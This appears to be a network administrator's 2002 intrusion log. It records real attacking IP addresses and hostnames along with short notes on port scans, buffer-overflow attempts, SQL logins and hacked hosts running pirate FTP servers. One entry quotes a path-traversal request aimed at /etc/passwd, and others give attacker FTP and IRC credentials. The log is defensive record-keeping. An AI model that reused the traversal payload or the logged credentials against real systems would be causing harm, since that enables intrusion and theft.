2002/11/08-20:44:34.45 192.108.16.5 () scannet for ports 445 139
2002/11/09-01:53:18.10 128.205.207.88 () scannet for ports 80
2002/11/09-04:38:11.19 63.230.208.51 () scannet for ports 1433
2002/11/09-14:40:56.45 207.61.234.99 () ftp passwd file from ace
2002/11/09-17:24:49.52 140.120.90.160 () scannet for ports 443
2002/11/09-17:45:13.72 24.203.112.43 (modemcable043.112-203-24.mtl.mc.videotron.ca) atack  132.235.4.63,132.235.4.72 porst 445,139
2002/11/09-17:45:36.57 24.203.112.43 () scannet for ports 445 139
2002/11/10-01:38:19.62 65.221.230.211 () scannet for ports 80
2002/11/10-03:04:57.89 66.41.90.72 () scannet for ports 445
2002/11/10-04:52:44.98 195.121.71.188 () scannet for ports 1433
2002/11/10-06:35:29.30 193.108.42.134 () scannet for ports 80
2002/11/10-08:54:00.74 80.143.50.64 () scannet for ports 80 57
2002/11/10-08:54:20.66 209.149.244.68 () scannet for ports 1433
2002/11/10-09:20:22.95 206.157.111.239 () scannet for ports 80
2002/11/10-11:34:10.85 80.135.46.241 () scannet for ports 1433
2002/11/10-14:07:41.84 202.145.56.241 () scannet for ports 80
2002/11/10-16:57:21.84 62.103.181.35 () scannet for ports 1433
2002/11/10-17:39:10.22 65.115.228.22 () scannet for ports 80
2002/11/10-18:25:43.68 80.136.155.187 () scannet for ports 1433
2002/11/10-19:35:43.25 24.198.51.76 () scannet for ports 1433
2002/11/10-22:57:15.95 200.80.130.136 ()  ftp passwd file from ace
2002/11/11-01:29:15.88 80.129.138.89 (p50818A59.dip.t-dialin.net) try to get passwd file via HEAD /cgi-bin/ssi//%2e%2e/%2e%2e/etc/passwd?/c+dir+c:\
2002/11/11-01:34:42.85 213.115.0.55 () scannet for ports 443
2002/11/11-05:51:02.97 199.237.94.220 () scannet for ports 445
2002/11/11-07:07:54.99 80.136.146.230 () scannet for ports 1433
2002/11/11-08:25:47.63 61.16.70.61 () scannet for ports 80
2002/11/11-10:43:30.20 195.64.95.24 (cust.95.24.adsl.cistron.nl) multiple tries to login to sql server as root
2002/11/11-13:05:10.96 68.57.249.173 () scannet for ports 80 445
2002/11/11-15:26:34.29 80.136.146.230 (p508892E6.dip.t-dialin.net) multiple tries to login to sql server as root
2002/11/11-18:58:04.47 211.154.93.38 () scannet for ports 1433
2002/11/11-20:45:06.71 61.193.168.209 () scannet for ports 80
2002/11/11-21:02:39.13 12.246.5.199 () scannet for ports 445
2002/11/11-21:50:08.55 12.246.5.199 (12-246-5-199.client.attbi.com) 1. dump FireDaemon, iroffer to  132.235.16.198 port 445
2002/11/11-21:50:08.55 12.246.5.199 (12-246-5-199.client.attbi.com) 2. join irc #SPEED-WAREZ. ftp server port 1534 hypnotikz/david
2002/11/11-22:12:03.66 24.166.122.217 () scannet for ports 139 445 80
2002/11/12-00:23:32.46 202.112.0.122 () scannet for ports 80
2002/11/12-06:31:24.56 206.30.127.196 () scannet for ports 80
2002/11/12-07:11:44.38 212.179.180.189 () scannet for ports 445 139 80

2002/11/13-20:31:35.04 200.45.217.48 (host48.200-45-217.telecom.net.ar) 1. use anon ftp to get passwd file from ace
2002/11/13-20:31:35.04 200.45.217.48 (host48.200-45-217.telecom.net.ar) 2. Wanted files sent to  10.0.0.111 ports 168x.
2002/11/14-08:06:48.92 216.232.171.143 (aoig3748y23jc.bc.hsia.telus.net) attack  132.235.19.209 & dump hacker files to it.
2002/11/14-09:29:16.00 212.170.193.57 (212-170-193-57.uc.nombres.ttd.es) anon ftp passwd file from ace, crack and try to login
2002/11/14-16:47:04.40 66.36.129.24 (dsl-129-24.aei.ca) ftp to 132.235.16.8 on hight# port - hacked machine.
2002/11/15-12:26:02.51 211.234.63.197 (cityzone.co.kr) buff overflow attacks port 6112
2002/11/15-15:17:02.27 80.224.194.135 (135-194-ADSL.red.retevision.es) ftp passwd file  from ace
2002/11/16-20:49:09.00 210.212.255.130 (MEPCO  Schlenk Engineering College,in) buff overflow attacks port 6112
2002/11/18-19:32:44.17 195.232.51.3 (fra-tgn-oys-vty3.as.wcom.net) 1. telnet buff overflow attack - got root shell
2002/11/18-19:32:44.17 195.232.51.3 (fra-tgn-oys-vty3.as.wcom.net) 2. ftp to ftp.angelfire.com user ky3/kamikazzo pass kamikaze69
2002/11/18-19:32:44.17 195.232.51.3 (fra-tgn-oys-vty3.as.wcom.net) 3. to get sun-ok.tar
2002/11/20-19:31:08.13 12.229.244.129 (12-229-244-129.client.attbi.com) ftp to local hacked machien
2002/11/22-07:43:48.05 165.229.65.20 (pc065020.yeungnam.ac.kr) CDE dtspcd exploit attempt
2002/11/23-08:47:55.43 212.199.253.38 () visit hacker ftp site on hacked machine
2002/11/24-18:00:06.23 200.68.211.169 (PRIMA,S.A.,Buenos Aires, AR) 1.scan ace w/anon ftp, download dummy passwd file vi anon/ftp
2002/11/24-18:00:06.23 200.68.211.169 (PRIMA,S.A.,Buenos Aires, AR) 2. try to login w/cracked passwds.
2002/11/27-02:56:23.05 12.229.244.129 (12-229-244-129.client.attbi.com) revisit hacked pc's pirate ftp server

- oh, I give up. Too may scans. We'll pick back up after the firewall is up...